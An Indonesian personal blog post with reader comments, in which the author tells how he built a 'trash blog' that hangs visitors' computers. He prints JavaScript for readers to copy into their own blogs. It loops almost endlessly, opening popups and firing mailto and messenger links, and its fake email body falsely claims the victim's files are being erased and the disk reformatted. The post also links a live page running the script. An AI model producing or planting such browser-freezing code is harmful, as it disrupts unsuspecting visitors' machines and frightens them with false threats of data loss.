News Update :

Blog Lu Sampah Java Script

26 Maret 2011

Salam blogger, Pada kesempatan kali ini berbeda dengan hari-hari biasanya sedikit kata-kata yang tak pantas dan sangat menarik yang perlu di pelajari, untuk itu akan saya kupas sebersih kain putih xixixi apa maksudnya kawan...aku juga agak bingung dengan judul saya tapi apalah daya kata-kata itu saya peroleh dari seorang blogger kepada saya, "Blog lu sampah" merupakan kata-kata yang sangat bermakna dan perlu di mengerti kawan, apa sih maksudnyaaa...???? pasti bolak-balik tanya terus apa sih...artinya....???


Begini kawan perlu saya ceritakan sebuah pengalaman saya waktu dulu saya belajar, saya belajar dari pengalaman seseorang, dan juga belajar dari membaca, mempraktekkan dan akhirnya memperoleh hasilnya. nah pada waktu itu salah satu teman blloger mengirim sebuah link yang sangaaaat aneh dan sungguh aneh yang saya bikin penasaran, kenapa begitu??? karena link yang didalamnya ditanamkan sebuah Java Script dan trik ini belum pernah saya pelajari, nah akhirnya dengan rasa penasaran saya mencoba untuk mempelajarinya,

Akhirnya Q Ingin Bisa mempraktekan apa yang ia kasihkan, belajar hanya dari sebuah link, sebuah link yang dapat membuat komputer bisa hank, tak bisa beroprasi, namun link ini tak berbahaya pada komputer kita, karena setelah di restart komputer akan kembali normal lagi karena ini bukanlah sebuah virus hanya sebuah permainan belaka, kata ku sih ini hanyalah permainan anak yang baru lulus SD aja gitu.....!!!!!!!!

Pada waktu itu saya membuat link INI di waktu malam hari kira-kira waktu itu jam 12 malam tepatnya pun jauh dari Pulau Jawa, saya pada waktu itu di Kota Sorong Irian Jaya dan pada malam hari suasana yang gelap dan tak ada seorang teman yang menemani aku mencoba membuatnya dan kebetulan Laper minta ampun banget pokoknya, cari-cari makanan  ketemunya mi Sedap Soto yang kuah itu loh,,,cari yang sedap goreng udah habis, mau masak air, air pun kebetulan habis, akhirnya makan mie mentah deh,,,dengan punyalah sebuah unek-unek menamai sebuah blog dengan judul gara-gara makan mie mentah dimalam hari terbuatlah sebuah Sampah Blog yang di Katakan Oleh salah seorang Blogger barusan, nih dia alamatnya
http://miesedaap.blogspot.com/  iya kan alamtnya miesedap. Mau tau cara pembuatannya gampang kok.

Tapi sabar dulu kawan cerita belum selesai, sengaja saya posting ini mengajak sobat semua membuka hati  dan mata kita untuk berbenah, apakah pantas seorang blogger bilang Blog lu sampah, jika yang kau maksud sampah adalah link INI emng betul kawan ini adalah sampah sebuah Java Script yang saya tanamkan dalam sebuah blog yang dapat membuat komputer hank, tak dapat beroprasi, dan tak dapat digerakkan, namun ini hanyalah sebuah mainan seorang Blogger yang lulusan SD aja, saya tegaskan lagi ini bukanlah virus,  sebenarnya mudah cara menanganinya, tinggal di restart komputer kembali normal lagi, dan cara yang lain pun juga ada jika membuka link ini komputer baik-baik aja, seperti membuka blog-blog biasa NYA, jika kita menggunakan Mozilla tinggal kita masuk ke TOOLS ===> OPTIONS ===> CONTENT dan Kita Hilangkan Centangan ENABLE JAVASCRIPT kemudian OK beres deh tak kan berfungsi lagi java script didalamnya :

Mau Coba Uji Kemampuan Komputer Anda Silahkan DISINI 
Tak usah takut dengan alamat ini, Jika anda seorang super star buktikan merah mu hehehe.......!
KAMU TAK AKAN BISA JIKA TAK MAU MENCOBANYA

Ucapkanlah Terima Kasih Jika Anda mendapatkan Ilmu yang Baru
Sedikit Kata Terima Kasih yang Keluar dari Bibir Manis Mu
melebihi sebuah hadiah EMAS kawan

Oke mau tau cara membuatnya silahkan Copy Kode dibawah ini :

<script type="text/javascript">
var x = 2;
while (x <= 100000000000000000000000000000000000000000)
{
window.open ("http://www.kreatifitasmaya.co.cc/","popupwindow");
document.location.href="Mailto:sory?cc=coy%20sory&subject=saya%20lagi&body=gak%20mut%20hari%20ini%20untuk%20itu%20bagi%20yang%20udah%20klik%20sukurin%20aja%20dalam%20hitungan%20detik%20komputer%20anda%20akan%20rusak%20seluruh%20file%20akan%20terhapus%20hardist%20akan%20keformat%20ulang%20windost%20akan%20blank%20silahkan%20di%20siram%20aja%20atau%20dibanting%20komputer%20anda%20karena%20gak%20ada cara%20percuma%20anda%20klik%20ctrl+alt+del%20untuk%20task%20manager%20tidak%20berfungsi%20restart%20aja%20lewat%20CPU%20atau%20jabut%20colokan%20komputer%20anda%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20Terimakasih%20Kepada%20Kang%20Brin-Tixs%20Saya%20Mohon%20Maaf%20-Brin-Tixs";
document.location.href="ymsgr:sendIM?Not-Hacker";
x++;
}
</script>

Silahkan sobat simpan dan edit sendiri di blog sobat semoga berhasil salam blogger dan sukses sll
Mohon Maaf Atas Segala Kekurangan
By Admin Q Ingin Bisa
Share this Article on :

16 komentar:

ijal fauzi mengatakan...

oh begitu ceritanya ya, mas? haduh salah pengertian :/ sorry aja deh . lagian kemarin mas juga iseng-iseng kayak gitu -__-" padahal saya lagi coba pasang widget susah banget, eh terpaksa di restart gara2 link itu. sekali lagi mohon maklum, sama2 salah :/ . thanks mas, salam blogger

Q Ingin Bisa mengatakan...

makanya kawan kl belum tau maksudnya jangan asal nyolot aja,,,kayak katak mau nyolot gitu xixixi
oke deh salam blogger sukses sll

ijal fauzi mengatakan...

ya ente juga sih mas, iseng nya kelewatan juga -_- namanya orang gak tau ya pasti kaget mas :/ saling memaafkan deh :p haha

Q Ingin Bisa mengatakan...

ahahah oxe deh i am sory
amu juga menghinanya klewatan iya,,
ox deh mantabbb

Personal Blog of Ayuni Rianthy mengatakan...

hahhahahh... thanks for sharing yaa...
iya klo pas didi restart ga hang lagi, klo hang n data hilang hehehehheh nangislah
salam
http://stopkeringatberlebih.com

Ladida Cafe mengatakan...

wkwkwkk . , maen2 javascript nih . ,

kyknya kok mncurigakan , wkwkwkk

Q Ingin Bisa mengatakan...

personal@ oke sob sama2, terimakasih atas kunjungannya...iya silahkan dicoba aja sampek puas iya....

ladida@ hahahahah iya main JS
iya kl penasaran dicoba juga boleh kok!!! met mencoba iya kawan

Windows 7 Blog mengatakan...

wah, makasih ya udah sharing!

Windows 7 Blog mengatakan...

o ya sobat, aq dah follow blog km, nmor 215!
follow back ya

Adityas Blog mengatakan...

tidak ada perubahan...
sama saja...
pengulangan while d script itu kirim pesan by email yah..??

sedikit mmbntu...
tp laptop saya bekerja seperti biasanya...
Salam Blogger,
Adityas Blog...

Q Ingin Bisa mengatakan...

Windows 7Blog@ iya sama-sama sob!!! oke segera follow back

Adityas Blog@ selamat datang sob, script diatas bekerja pada Mozilla aja kok, cuman iseng -iseng aja bukan apa2kok,,,,,
Salam blogger kembali

Sukses Sll

Organik Aceh mengatakan...

Artikel yang bermanfaat sob.., tambah lagi ilmunya. Thanks for share.

Organikaceh mengatakan...

Artikel yang bermanfaat sob.., tambah lagi ilmunya. Thanks for share.

fauns mengatakan...

Mantab,,,,,,,,,,,,,,,

aditya's blogsphere mengatakan...

Ada apa to om nanang ? itu kan cuman mailto boomer ? buka outlook ekspres kan ?trik itu akan mati meski memakai firefox jika kita merubah settingan mail windows, dari outlook ke browser biasa, ada di cpanel kok, silahkan di cari sendiri, dulu blog saya juga sering di hina orang dan alhamdulillah sampai sekarang saya masih ngeblog, para penghina juga dah berhenti ngeblog, ada satu komentar yang bilang 'sakit mata gue liat tulisan di atas" setelah saya buka blog nya, ternyata dia tidak kreatif, ndak bisa nulis dan ndak punya seni blogging, ah biarin lah sukses slalu ya

Anonim mengatakan...

Saya juga pernah makan mie sedap mentah. Terpaksa

Poskan Komentar

Assalamu'alaikum sobat semua...jika sobat sudah mampir di blog saya jangan lupa komentarnya ya,,,mohon saran dan kritiknya, karena setetes komentar anda sangat berarti untuk kemajuan blog ini, Terima kasih semua. SALAM BLOGGER

 

© Copyright Q Ingin Bisa 2010 -2011 | Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.